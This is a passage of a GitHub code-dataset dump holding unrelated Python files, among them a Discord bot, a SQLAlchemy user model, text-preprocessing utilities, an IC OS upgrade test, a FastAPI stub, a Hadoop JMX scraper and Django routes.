background.paste(d2,(115,84))\r\n            background.save('Config/os.png')\r\n            img = Image.open('Config/os.png')\r\n            draw = ImageDraw.Draw(img)\r\n            font = ImageFont.truetype(\"./l_10646.ttf\", 18)\r\n            draw.text((117,60),f\"{message.author}\",(255, 255, 255),font=font)\r\n            font = ImageFont.truetype(\"./l_10646.ttf\", 14)\r\n            draw.text((190,85),f\"Level {level}\",(255, 255, 255),font=font)\r\n            img.save('Config/sample-out.png')\r\n            await message.author.send(file=discord.File('Config/sample-out.png'))\r\n\r\n            with open('Config/data.json','w') as f:\r\n                json.dump(data,f,indent = 3)\r\n        \r\n        data[author]['experience'] += random.randint(1,5)\r\n        with open('Config/data.json','w') as f:\r\n            json.dump(data,f,indent = 3)\r\n    \r\n    except Exception as e:\r\n        print(e)\r\n\r\n    await bot.process_commands(message)\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n    guild = str(member.guild.id)\r\n    with open('Config/guildlogs.json','r') as f:\r\n        data = json.load(f)\r\n    try:\r\n        if data[guild]['Join_Message'] == 'Enabled':\r\n            member_count = len([m for m in member.guild.members if not m.bot])\r\n            channel = bot.get_channel(int(data[guild]['Join ID']))\r\n            await channel.send(f\":tada: Hi, {member.mention}, Welcome to {member.guild}, you're our member #{member_count}! \")\r\n    except Exception:\r\n        pass\r\n\r\n    try:\r\n        if not data[guild]['Autorole'] == 'Disabled':\r\n            role = discord.utils.get(member.guild.roles, name=data[str(member.guild.id)]['Autorole'])\r\n            await member.add_roles(role)\r\n        \r\n    except KeyError:\r\n        pass\r\n\r\n@has_permissions(administrator = True)\r\n@bot.command()\r\nasync def reactrole(ctx,channel: discord.TextChannel = None,max_roles:str = None,title:str = None,*,description:str = None):\r\n    guild = str(ctx.guild.id)\r\n    def check(m):\r\n        return m.author == ctx.author\r\n    \r\n    if max_roles is None or title is None or description is None or channel is None:\r\n        await ctx.send('Command Usage: reactrole `<#channel>` `<max_roles>` `<title>` `<description>`')\r\n        return\r\n    else:\r\n        with open('Config/Reactions.json') as f:\r\n            r = json.load(f)\r\n        \r\n        num = int(max_roles)\r\n        iterate = 0\r\n\r\n        while iterate < num:\r\n            msg = await ctx.send(f'Enter the Role Name: #{iterate+1}')\r\n            role_name = await bot.wait_for('message',check = check)\r\n            await msg.delete()\r\n            msg = await ctx.send(f'Enter the Reaction Emoji: #{iterate+1}')\r\n            emoji = await bot.wait_for('message',check = check)\r\n            role_name = role_name.content\r\n            emoji = emoji.content\r\n            await msg.delete()\r\n            if guild not in r:\r\n                r[guild] = {}\r\n            \r\n            r[guild][str(emoji)] = role_name \r\n            iterate += 1\r\n        \r\n        r[guild]['Channel'] = channel.id\r\n        await ctx.send('Reaction Roles has been activated.')\r\n        with open('Config/Reactions.json','w') as f:\r\n            json.dump(r,f,indent = 3)\r\n\r\n        with open('Config/Reactions.json','r') as f:\r\n            r = json.load(f)\r\n\r\n        embed = discord.Embed(title = title,description = description,color = 0x90e2fe)\r\n        msg = await channel.send(embed = embed)\r\n        for emojis in r[guild]:\r\n            try:\r\n                await msg.add_reaction(emojis)\r\n            except Exception:\r\n                pass\r\n\r\n\r\n@bot.event\r\nasync def on_raw_reaction_add(payload):\r\n
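    # Expected Config/Reactions.json layout (illustrative):\r\n    #   {\"<guild id>\": {\"<emoji>\": \"<role name>\", ..., \"Channel\": <channel id>}}\r\n    with open('Config/Reactions.json') as f:\r\n        r = json.load(f)\r\n    \r\n    guild = str(payload.guild_id)\r\n    channel = await bot.fetch_channel(payload.channel_id)\r\n    user = channel.guild.get_member(payload.user_id)\r\n    emoji = payload.emoji\r\n    emoji = str(emoji)\r\n    if guild in r:\r\n        if channel.id == r[guild]['Channel']:\r\n            for em in r[guild]:\r\n                if em == emoji:\r\n                    role = 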
discord.utils.get(channel.guild.roles, name=r[guild][em])\r\n                    await user.add_roles(role) \r\n\r\n@bot.event\r\nasync def on_raw_reaction_remove(payload):\r\n    emoji = str(payload.emoji)\r\n    guild = bot.get_guild(payload.guild_id)\r\n    gi = str(guild.id)\r\n    member = guild.get_member(payload.user_id)\r\n    channel = payload.channel_id\r\n    with open('Config/Reactions.json') as f:\r\n        r = json.load(f) \r\n    if str(guild.id) in r:\r\n        if channel == r[gi]['Channel']:\r\n            for em in r[gi]:\r\n                if em == emoji:\r\n                    channel = await bot.fetch_channel(payload.channel_id)\r\n                    role = discord.utils.get(guild.roles, name=r[gi][em])\r\n                    await member.remove_roles(role) \r\n\r\n@bot.command()\r\nasync def help(ctx):\r\n    \r\n    embed=discord.Embed(color=0x955cff)\r\n    embed.set_author(name=\"Commands Help\")\r\n    embed.add_field(name=\":gear: **Moderations**\", value=\"`BAN` `UNBAN` `KICK` `CLEAR` `WARN` `REMOVEWARN`\", inline=False)\r\n    embed.add_field(name=\":tada: **Giveaway**\", value=\"`GSTART` `GSTOP`\", inline=False)\r\n    embed.add_field(name=\":game_die: **Economy**\", value=\"`ROB` `WORK`\", inline=False)\r\n    embed.add_field(name =\":dna: **General**\", value = \"`WELCOMEMESSAGE` `AUTOROLE` `REACTIONROLE` `SETLOGS`\", inline = False)\r\n    embed.timestamp = datetime.utcnow()\r\n    embed.set_footer(text = f'{ctx.author} ')\r\n    await ctx.send(embed=embed)\r\n\r\n#COGS / Command loading: one loop per command group folder\r\nfor group in ('Giveaway', 'Moderations', 'Economy', 'Misc'):\r\n    for filename in os.listdir(f'./Commands/{group}'):\r\n        if filename.endswith('.py'):\r\n            bot.load_extension(f'Commands.{group}.{filename[:-3]}')\r\n\r\n\r\nbot.run('TOKEN HERE')","repo_name":"karansharma002/Discord","sub_path":"Discord Multipurpose 2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26852450145","text":"from sqlalchemy import Boolean, Column, String, DateTime, Integer\nfrom sqlalchemy.orm import relationship\n\nfrom app.conf.db.base_tablename_class import Base\n\nUSERS_SCHEMA = 'users'\n\n\nclass User(Base):\n    \"\"\"\n    Table with User Data\n    \"\"\"\n\n    __tablename__ = \"user\"\n    __table_args__ = {\n        \"schema\": USERS_SCHEMA,\n        \"comment\": \"Table with all users\"\n    }\n\n    id = Column(Integer, primary_key=True, autoincrement=True)\n    name = Column(\n        String, index=True,\n        comment='name of user',\n    ) # first name\n    middle_name = Column(\n        String,\n        comment='middle name of user',\n    ) # middle name (patronymic)\n    last_name = Column(\n        String, index=True,\n        comment='last name of user',\n    ) # last name\n\n    email = Column(\n        String,\n        unique=True,\n        index=True,\n        nullable=False,\n        comment='email',\n    )\n    username = Column(\n        String,\n        unique=True,\n        nullable=True,\n        comment='username',\n    )\n    hashed_password = Column(\n        String,\n        nullable=False,\n        comment='passwd',\n    )\n\n    is_active = Column(\n        Boolean(),\n        default=True,\n        comment='locked or unlocked',\n    )\n    is_superuser = Column(\n        Boolean(),\n        default=False,\n    )\n    is_subscribed = Column(\n        Boolean(),\n        default=False,\n    )\n\n
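    # Timestamp fields: DateTime() without timezone=True stores naive datetimes,\n    # so timezone handling is left to the application layer.\n    created_at = Column(DateTime())\n    updated_at = Column(DateTime())\n    birth_date = 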
Column(DateTime())\n subscription_ends = Column(DateTime())\n last_login_at = Column(DateTime())\n\n roles = relationship(\"UserXRole\", back_populates=\"user\", uselist=False)\n","repo_name":"BesedinGeny/mathsite_backend","sub_path":"app/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8914341165","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nN, M, K = map(int, input().split())\r\narr=[[0]*(M) for _ in range(N)]\r\nfor _ in range(K):\r\n a, b = map(int, input().split())\r\n arr[a-1][b-1]=1\r\n \r\ndx = [1,0,-1,0]\r\ndy = [0,1,0,-1]\r\n\r\nfrom collections import deque\r\nq = deque()\r\nresult = 0\r\nfor j in range(M):\r\n for i in range(N):\r\n if arr[i][j]==1:\r\n q.append((i,j))\r\n arr[i][j]=0\r\n ans = 1\r\n while q:\r\n x, y = q.popleft()\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n if -1 < nx and nx < N and -1 < ny and ny < M and arr[nx][ny]==1:\r\n q.append((nx,ny))\r\n arr[nx][ny]=0\r\n ans += 1\r\n result = max(result, ans)\r\n \r\nprint(result)","repo_name":"qorjiwon/Algorithm","sub_path":"백준/Silver/1743. 음식물 피하기/음식물 피하기.py","file_name":"음식물 피하기.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18284273019","text":"import re, unicodedata\nfrom nlp_id.lemmatizer import Lemmatizer\nfrom nlp_id.stopword import StopWord \nfrom Sastrawi.Stemmer.StemmerFactory import StemmerFactory\nfrom nltk.tokenize import word_tokenize\n\nunwanted_words = [ \n 'jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', \n 'sep', 'oct', 'nov', 'dec', 'uaddown', 'weareuad', 'lam', 'https', 'igshid', 'balas', 'replying', 'to'\n]\n\ndef hitung_kemunculan(kalimat, array_kata):\n result = {}\n print(kalimat)\n # print(kalimat.find(\"internet\"))\n \n for i, kata in enumerate(array_kata):\n jumlah_kemunculan = 0\n for index, kataDataFrame in enumerate(kalimat):\n jumlah_kemunculan += kataDataFrame.count(kata)\n result[f'{kata}'] = jumlah_kemunculan\n return result\n\ndef Case_Folding(text):\n try:\n # Mengubah text menjadi lowercase\n text = text.lower()\n # Menghapus white space\n text = re.sub('[\\s]+', ' ', text)\n \n return text\n except AttributeError as error:\n raise AttributeError(str(error))\n\ndef Cleansing(text):\n try:\n text = text.lstrip()\n # Hapus tag atau tagar menggunakan metode sub() dari modul re\n text_cleanedat = re.sub(r'@\\w+\\s', '', text)\n text_cleaned = re.sub(r'#\\w+\\s', '', text_cleanedat)\n \n # Definisikan pola regex untuk mendeteksi link\n pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\\\(\\\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\n\n # Definisikan pola regex untuk mendeteksi domain\n patternDomain = r'\\b[A-Za-z0-9-]+(?:\\.[A-Za-z0-9-]+)*\\.[A-Za-z]{2,}\\b'\n \n # Hapus domain menggunakan metode sub() dari modul re\n text = re.sub(patternDomain, \"\", text_cleaned)\n\n # Hapus link menggunakan metode sub() dari modul re\n text = re.sub(pattern, \"\", text) \n \n # hapus non-ascii \n text = unicodedata.normalize(\"NFKD\", text).encode(\"ascii\", \"ignore\").decode(\"utf-8\", \"ignore\")\n \n # Menghapus tanda baca \n text = re.sub(r'[^\\w]|_', ' ', text)\n \n # Menghapus angka\n text = re.sub(\"\\S*\\d\\S*\", \"\", text).strip()\n text = re.sub(\"\\b\\d+\\b\", \" \", text)\n return text.strip()\n except TypeError as error:\n raise TypeError(str(error))\n \n\ndef lemmatisasi():\n \"\"\"\n 
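# The grid record above zeroes visited cells in place; this is a sketch of the same
# BFS largest-component search with an explicit seen matrix, so the input grid survives.
from collections import deque

def largest_component(grid):
    rows, cols = len(grid), len(grid[0])
    seen = [[False] * cols for _ in range(rows)]
    best = 0
    for r in range(rows):
        for c in range(cols):
            if grid[r][c] == 1 and not seen[r][c]:
                seen[r][c] = True
                queue, size = deque([(r, c)]), 0
                while queue:
                    x, y = queue.popleft()
                    size += 1
                    for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
                        nx, ny = x + dx, y + dy
                        if 0 <= nx < rows and 0 <= ny < cols and grid[nx][ny] == 1 and not seen[nx][ny]:
                            seen[nx][ny] = True
                            queue.append((nx, ny))
                best = max(best, size)
    return best

print(largest_component([[1, 1, 0], [0, 1, 0], [0, 0, 1]]))  # -> 3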
mengembalikan kata kepada kata dasarnya yang disesuaikan dengan kamus Bahasa Indonesia\n \"\"\"\n lemmatizer = Lemmatizer()\n return lemmatizer\n\ndef stemming():\n # membuat stemmer\n factory = StemmerFactory()\n stemmer = factory.create_stemmer()\n return stemmer\n\ndef Slangwords(text, slang_dict):\n words = text.split()\n normalized_words = [slang_dict[word] if word in slang_dict else word for word in words]\n normalized_text = ' '.join(normalized_words)\n return normalized_text\n\ndef stopwordRemoval():\n stopword = StopWord() \n return stopword\n\ndef RemoveUnwantedWords(text):\n word_tokens = word_tokenize(text)\n fillterd_sentence = [word for word in word_tokens if not word in unwanted_words]\n return ' '.join(fillterd_sentence)\n\n# Menghitung kata-kata positif / negatif pada teks dan menentukan sentimennya\ndef lexicon_indonesia(text, list_positive, list_negative):\n positive_words = []\n negative_words = []\n neutral_words = []\n score = 0\n for word in text:\n if (word in list_positive):\n score += 1\n positive_words.append(word)\n if (word in list_negative):\n score -= 1\n negative_words.append(word)\n if (word not in list_positive and word not in list_negative): \n neutral_words.append(word)\n\n polarity=''\n if (score > 0):\n polarity = 'positive'\n elif (score < 0):\n polarity = 'negative'\n else:\n polarity = 'neutral'\n \n return score, polarity, positive_words, negative_words\n","repo_name":"hafisKuhfi14/testDeta","sub_path":"app/modules/txt_preprocessing.py","file_name":"txt_preprocessing.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71859688168","text":"#!/usr/bin/env python3\nimport atexit\nimport os\nimport subprocess\nimport sys\nimport tempfile\n\nimport gflags\nimport ictools\nimport vmtools\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_string(\"upgrade_tar\", None, \"Path to upgrade tar file\")\ngflags.MarkFlagAsRequired(\"upgrade_tar\")\ngflags.DEFINE_string(\"script_dir\", None, \"Path to folder with scripts\")\ngflags.MarkFlagAsRequired(\"script_dir\")\ngflags.DEFINE_string(\"disk_image\", None, \"Path to disk image to use for VMs\")\ngflags.MarkFlagAsRequired(\"disk_image\")\ngflags.DEFINE_string(\"version\", None, \"Version of the disk image\")\ngflags.MarkFlagAsRequired(\"version\")\n\n\ndef create_upgrade_image(version):\n upgrade_image = tempfile.mktemp(suffix=\".tar.gz\")\n atexit.register(lambda: os.remove(upgrade_image))\n\n subprocess.run(\n [\n \"%s/ci-change-upgrade-version.sh\" % FLAGS.script_dir,\n \"--upgrade-image=%s\" % FLAGS.upgrade_tar,\n \"--out=%s\" % upgrade_image,\n \"--version=%s\" % version,\n ],\n check=True,\n )\n\n return upgrade_image\n\n\ndef upgrade(ic_url, origin_ip):\n\n for iteration in range(75):\n upgrade_image = create_upgrade_image(iteration)\n\n run = True\n while run:\n r = subprocess.run(\n [\n \"%s/ci-bless-version.sh\" % FLAGS.script_dir,\n \"--origin-ip=%s\" % origin_ip,\n \"--upgrade-image=%s\" % upgrade_image,\n \"--nns-url=%s\" % ic_url,\n \"--ic-admin-bin=%s\" % FLAGS.ic_admin_bin,\n ],\n )\n run = r.returncode != 0\n\n run = True\n while run:\n r = subprocess.run(\n [\n \"%s/ci-upgrade.sh\" % FLAGS.script_dir,\n \"--origin-ip=%s\" % origin_ip,\n \"--upgrade-image=%s\" % upgrade_image,\n \"--nns-url=%s\" % ic_url,\n \"--ic-admin-bin=%s\" % FLAGS.ic_admin_bin,\n ],\n )\n run = r.returncode != 0\n\n\ndef main(argv):\n argv = FLAGS(argv)\n\n machines = vmtools.pool().request_machines(\n [\n {\"name\": \"node0\", 
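# A condensed sketch of the lexicon scoring used by lexicon_indonesia in the record above;
# set lookups replace the repeated list scans. The example words are made up.
def lexicon_score(tokens, positive, negative):
    pos, neg = set(positive), set(negative)
    score = sum((t in pos) - (t in neg) for t in tokens)
    polarity = 'positive' if score > 0 else 'negative' if score < 0 else 'neutral'
    return score, polarity

print(lexicon_score(['bagus', 'jelek', 'bagus'], ['bagus'], ['jelek']))  # (1, 'positive')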
\"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node1\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node2\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node3\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node4\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n ],\n )\n\n system_image = vmtools.SystemImage.open_local(FLAGS.disk_image)\n\n ic_config = ictools.ic_prep(\n subnets=[[machines[i].get_ipv6() for i in range(len(machines))]],\n version=FLAGS.version,\n root_subnet=0,\n )\n\n machine_config_images = [\n ictools.build_ic_prep_inject_config(machines[n], ic_config, n, ictools.build_ssh_extra_config())\n for n in range(len(machines))\n ]\n\n vmtools.start_machines(\n [(machine, system_image, config_image) for machine, config_image in zip(machines, machine_config_images)],\n start_ssh_log_streaming=True,\n )\n\n ic_url = \"http://[%s]:8080\" % machines[0].get_ipv6()\n\n ictools.wait_http_up(ic_url)\n\n ictools.nns_install(ic_config, ic_url)\n upgrade(ic_url, machines[0].get_ipv6())\n\n for i in range(len(machines)):\n machines[i].stop()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"simond110/ic","sub_path":"ic-os/guestos/tests/e2e-continuous-upgrade-testing.py","file_name":"e2e-continuous-upgrade-testing.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34375688926","text":"# a program that will print the earning value based on user's picking things.\r\n\r\nimport random\r\n\r\nArk1 = [\"room1\", \"room2\"]\r\nArk2 = [\"room1\", \"room2\"]\r\nArk1_room1 = [\"apple\", \"banana\", \"mango\", \"orange\", \"pineapple\", \"jackfruit\", \"coconut\", \"olive\"]\r\nArk1_room2 = [\"mobile\", \"computer\", \"pc\", \"smartwatch\", \"watch\", \"clock\", \"tab\", \"tv\"]\r\nArk2_room1 = [\"richman\", \"polo\", \"zara\", \"louisVuitton\", \"gucci\", \"nike\", \"armani\", \"D&G\"]\r\nArk2_room2 = [\"nike\", \"adidas\", \"allStar\", \"northStar\", \"vans\", \"puma\", \"reebok\", \"newBalance\"]\r\n\r\nthings_info = {\"apple\":20, \"banana\":10, \"mango\":25, \"orange\":30, \"pineapple\":40, \"jackfruit\":100, \"coconut\":50, \"olive\":80, \"mobile\":130000, \"computer\":99000, \"pc\":157000, \"smartwatch\":20000, \"watch\":200000, \"clock\":125000, \"tab\":40000, \"tv\":50000,\r\n\"richman\":12000, \"polo\":11000, \"zara\":10000, \"louisVuitton\":9000, \"gucci\":8000, \"nike\":7000, \"armani\":6000, \"D&G\":5000, \"nike\":12000, \"adidas\":12000, \"allStar\":11000, \"northStar\":11000, \"vans\":10000, \"puma\":9000, \"reebok\":8000, \"newBalance\":10000}\r\n\r\nli_ark1_room1 = [\"dummy\", \"dummy\", \"dummy\"]\r\nli_ark1_room2 = [\"dummy\", \"dummy\", \"dummy\"]\r\nli_ark2_room1 = [\"dummy\", \"dummy\", \"dummy\"]\r\nli_ark2_room2 = [\"dummy\", \"dummy\", \"dummy\"]\r\n\r\ndef showList(flat):\r\n\tif flat == 1:\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark1_room1[i] = Ark1_room1[rand_i]\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark1_room2[i] = Ark1_room2[rand_i]\r\n\telse:\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark2_room1[i] = Ark2_room1[rand_i]\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark2_room2[i] = Ark2_room2[rand_i]\r\n\r\ndef showEarnVal(thing1, thing2):\r\n\tearn_val1 = things_info[thing1]\r\n\tearn_val2 = 
things_info[thing2]\r\n\ttotal_earn_val = earn_val1 + earn_val2\r\n\r\n\tprint(\"You have picked two things from two room. Here is the earning value of your: $\", total_earn_val)\r\n\t\r\n\tif total_earn_val in range(1, 20000):\r\n\t\tprint(\"Poor earning! May be not your day. Pick things wisely. Better luck next time.\")\r\n\telif total_earn_val in range(20000, 50000):\r\n\t\tprint(\"Good! Try to earn more.\")\r\n\telse:\r\n\t\tprint(\"Awesome! You have earned big bucks. Keep it up. See you again.\")\r\n\t\r\n\r\nprint(\"Welcome to Pick N Earn! It's time to pick and earn :)\")\r\nprint(\"There are two flats. 'The Ark-1' and 'The Ark-2'\")\r\n\r\nprogram_status = True\r\nsub_program_status = True\r\n\r\nwhile program_status:\r\n\tflat = int(input(\"Enter a choice. For 'The Ark-1' type 1 and for 'The Ark-2' type 2. \"))\r\n\t\r\n\tif flat == 1:\r\n\t\tprint(\"You have entered\", Ark1[0], \"! Pick only a one thing from the following list:\")\r\n\t\tshowList(flat)\r\n\r\n\t\twhile sub_program_status:\r\n\t\t\tprint(\"Wow! Fruits found! Good for health.\", li_ark1_room1)\r\n\t\t\tthing1 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\tthing1 = thing1.lower()\r\n\t\t\t\r\n\t\t\tif thing1 not in li_ark1_room1:\r\n\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\tcontinue\r\n\t\t\telse:\r\n\t\t\t\tprint(\"You have entered\", Ark1[1], \"! Pick only a one thing from the following list:\")\r\n\t\t\t\t\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tprint(\"Wow! Gadgets found!\", li_ark1_room2)\r\n\t\t\t\t\tthing2 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\t\t\tthing2 = thing2.lower()\r\n\t\t\t\t\t\r\n\t\t\t\t\tif thing2 not in li_ark1_room2:\r\n\t\t\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tshowEarnVal(thing1, thing2)\r\n\t\t\t\t\t\tsub_program_status = False\r\n\t\t\t\t\t\tprogram_status = False\r\n\t\t\t\t\t\tbreak\r\n\telif flat == 2:\r\n\t\tprint(\"You have entered\", Ark2[0], \"! Pick only a one thing from the following list:\")\r\n\t\tshowList(flat)\r\n\t\t\r\n\t\twhile sub_program_status:\r\n\t\t\tprint(\"Wow! T-shirts found!\", li_ark2_room1)\r\n\t\t\tthing1 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\t\r\n\t\t\tif thing1 not in li_ark2_room1:\r\n\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\tcontinue\r\n\t\t\telse:\r\n\t\t\t\tprint(\"You have entered\", Ark2[1], \"! Pick only a one thing from the following list:\")\r\n\t\t\t\t\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tprint(\"Wow! shoes found!\", li_ark2_room2)\r\n\t\t\t\t\tthing2 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\t\t\t\r\n\t\t\t\t\tif thing2 not in li_ark2_room2:\r\n\t\t\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tshowEarnVal(thing1, thing2)\r\n\t\t\t\t\t\tsub_program_status = False\r\n\t\t\t\t\t\tprogram_status = False\r\n\t\t\t\t\t\tbreak\r\n\telse:\r\n\t\tprint(\"Please type a valid choice! 
Type 1 or 2.\")\r\n\t\tcontinue","repo_name":"rashedrahat/wee-py-proj","sub_path":"pickNearn.py","file_name":"pickNearn.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9760819719","text":"from player import Player\r\n\r\ndef updatePlayers(players):\r\n colors = ['cornflowerblue', 'coral', 'crimson', 'goldenrod', 'darkblue', 'green',\r\n 'blue', 'darkred', 'salmon', 'sienna', 'slateblue', 'violet', 'purple', 'gray']\r\n\r\n for i, p in enumerate(players):\r\n players[i].checkByes()\r\n players[i].setAverages()\r\n players[i].setDiffs()\r\n players[i].setColor(colors[i])\r\n #players[i].printPlayer()\r\n\r\n return players\r\n","repo_name":"amjohnson36/FantasyGraphs","sub_path":"updatePlayers.py","file_name":"updatePlayers.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23194580125","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom enum import Enum\nfrom pydantic import BaseModel\n\n\nclass Category(str, Enum):\n atheism = \"atheism\"\n climate_change = \"climate_change\"\n hillary_clinton = \"hillary_clinton\"\n legalize_abortion = \"legalize_abortion\"\n feminist_movement = \"feminist_movement\"\n\n\nclass Target(BaseModel):\n model: str = 'Multiclass'\n description: str = None\n category: Category\n tweet: str\n\n\napp = FastAPI(debug=True) # decorator\n\n\"\"\"\nPATH/ROUTE OPERATION FUNCTIONS.\npost: create data\nput: update data\nget: get data\ndelete: del data\n\ncoroutines: coroutines are functions whose execution you can pause (like generators)\nevent loop: when A happens, do B (asyncio)\nasync fn: define a funcion as being a coroutine --> async def name(): await stufff() like yield from stuff()\n\"\"\"\n\n\n@app.get(\"/\")\nasync def root():\n return {'message': 'Hello there! This is an API that is able to classify tweets stances for 5 controversial '\n 'topics. That for now... but the idea is to build a tool to arbitrary classify text for over '\n '100 different categories and able to extract best candidates insides a corpus... you will '\n 'see. For now, move to \"home\".'}\n\n\n@app.get(\"/home\")\nasync def home_page():\n return {'message': 'Home sweet home. Here you will decide what NLP task you want to solve and in which language.'}\n\n\n@app.get(\"/home/multiclass/{category}\")\nasync def get_model(category: Category, tweet: str = 'pio! pio!'):\n response = {'category':category, 'message': 'all rigth!'}\n if tweet:\n response.update({'tweet': tweet})\n if category == Category.atheism:\n return {'category': category, 'message': 'fast-bert for multiclass in a religious topic, all right!',\n 'tweet': tweet}\n if category.value == 'climate_change':\n return {'category': category, 'message': 'fast-bert for multiclass in somthing of this nature?, of course!',\n 'tweet': tweet}\n if category == Category.hillary_clinton:\n return {'category': category, 'message': 'fast-bert for multiclass about a specific politic figure, lets find '\n 'out!', 'tweet': tweet}\n if category == Category.legalize_abortion:\n return {'category': category, 'message': 'fast-bert for multiclass in... oh... sad... legalization of '\n 'abortion. 
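# In the Pick N Earn record above, showList fills each room with repeated
# random.randint indices, so the same item can appear twice. random.sample draws
# without replacement; a sketch (the function name is illustrative):
import random

def pick_room_items(items, k=3):
    return random.sample(items, k)

fruits = ["apple", "banana", "mango", "orange", "pineapple", "jackfruit", "coconut", "olive"]
print(pick_room_items(fruits))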
Lets see.', 'tweet': tweet}\n return {'category': category, 'message': 'fast-bert for multiclass in this fast-growing movement, all right!',\n 'tweet': tweet}\n\n\n@app.post(\"/home/multiclass/\")\nasync def get_response(query: Target):\n response = query.dict()\n # here I should run the model depending on the query params\n response.update({'prediction': 'Not implemented :S'})\n return response\n\nif __name__ == '__main__':\n uvicorn.run(app, host='127.0.0.1', port=8000)\n","repo_name":"LaverdeS/Introduction_NLP","sub_path":"src/restapi/source/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27534685369","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\r\nimport threading\r\nimport requests\r\n\r\nfrom utils import get_module_logger\r\n\r\n\r\nlogger = get_module_logger(__name__)\r\n\r\n\r\nclass Scraper(threading.Thread):\r\n def __init__(self, url, result):\r\n super(Scraper, self).__init__()\r\n self.name = \"thread-%s\" % url\r\n self.url = url\r\n self.result = result\r\n\r\n def run(self):\r\n result = []\r\n try:\r\n s = requests.session()\r\n response = s.get(self.url, timeout=5)\r\n except Exception as e:\r\n logger.warning(\"Get {0} failed, error: {1}.\".format(self.url, str(e)))\r\n else:\r\n if response.status_code != requests.codes.ok:\r\n logger.warning(\"Get {0} failed, response code is: {1}.\".format(self.url, response.status_code))\r\n else:\r\n rlt = response.json()\r\n if rlt and \"beans\" in rlt:\r\n result = rlt['beans']\r\n else:\r\n logger.warning(\"No metrics get in the {0}.\".format(self.url))\r\n s.close()\r\n if len(result) > 0:\r\n self.result.append(result)\r\n\r\n\r\nclass ScrapeMetrics(object):\r\n def __init__(self, urls):\r\n self.urls = urls\r\n\r\n def scrape(self):\r\n result = []\r\n tasks = [Scraper(url, result) for url in self.urls]\r\n for task in tasks:\r\n task.start()\r\n for task in tasks:\r\n task.join()\r\n return result\r\n","repo_name":"opsnull/hadoop_jmx_exporter","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"} +{"seq_id":"17609919500","text":"from django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n path('', index, name='index'),\n path('disk/<int:pk>', disk, name='disk'),\n path('disk/create/', disk_create, name='disk_create'),\n path('disk/edit/<int:pk>', disk_edit, name='disk_edit'),\n path('disk/delete/<int:pk>', disk_delete, name='disk_delete'),\n]","repo_name":"vitorqf/django-disk-model","sub_path":"app/core/sebo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5685682159","text":"import gym\r\nimport numpy as np\r\nimport time\r\nfrom collections import deque\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef make_normal_env():\r\n env = gym.make('BipedalWalker-v3')\r\n env.seed(10)\r\n print('observation space:', env.observation_space)\r\n print('action space:', env.action_space)\r\n return env\r\n\r\n\r\ndef make_hardcore():\r\n env = 